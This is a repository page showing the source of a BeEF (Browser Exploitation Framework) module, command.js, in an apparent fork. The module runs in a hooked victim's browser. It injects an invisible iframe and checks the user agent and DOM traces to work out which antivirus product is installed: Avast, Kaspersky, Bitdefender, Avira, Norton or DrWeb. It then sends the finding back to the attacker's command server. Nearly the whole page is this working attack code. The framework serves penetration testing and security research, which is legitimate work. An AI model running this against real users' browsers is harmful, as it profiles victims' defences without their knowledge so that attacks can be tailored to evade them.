Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
d3aef8aec6f9ae83f62a9e994cd3b2498377e321
beef/modules/host/detect_antivirus/command.js
zinduolis 95793433fa Update copyright year to 2026
2025-12-26 19:18:05 +10:00

44 lines
2.1 KiB
JavaScript
Raw Blame History

//
// Copyright (c) 2006-2026Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
//Detection of av elements starts
var image = "<body><img src='x'/></body>";
var hidden_iframe = beef.dom.createInvisibleIframe();
hidden_iframe.setAttribute("id", "frmin");
document.body.appendChild(hidden_iframe);
var kaspersky_iframe = hidden_iframe.contentDocument || hidden_iframe.contentWindow.document;
kaspersky_iframe.open();
kaspersky_iframe.write(image);
kaspersky_iframe.close();
var frm = document.getElementById("frmin");
ka = frm.contentDocument.getElementsByTagName("html")[0].outerHTML;
var AV = document.getElementById("abs-top-frame");
var NAV = document.getElementById("coFrameDiv");
var ASWregexp = new RegExp("ASW\/");
//Detection of av elements ends
if (ASWregexp.test(navigator.userAgent))
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'antivirus=Avast');
if (ka.indexOf("kasperskylab_antibanner") !== -1)
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'antivirus=Kaspersky');
else if (ka.indexOf("netdefender/hui/ndhui.js") !== -1)
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'antivirus=Bitdefender');
else if (AV !== null) {
if (AV.outerHTML.indexOf('/html/top.html') >= 0 & AV.outerHTML.indexOf('chrome-extension://') >= 0)
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'antivirus=Avira');
} else if (NAV !== null) {
var nort = NAV.outerHTML;
if (nort.indexOf('coToolbarFrame') >= 0 & nort.indexOf('/toolbar/placeholder.html') >= 0 & nort.indexOf('chrome-extension://') >= 0)
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'antivirus=Norton');
} else if (document.getElementsByClassName('drweb_btn').length > 0)
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'antivirus=DrWeb');
else beef.net.send('<%= @command_url %>', <%= @command_id %>, 'antivirus=Not Detected');
});
Reference in New Issue View Git Blame Copy Permalink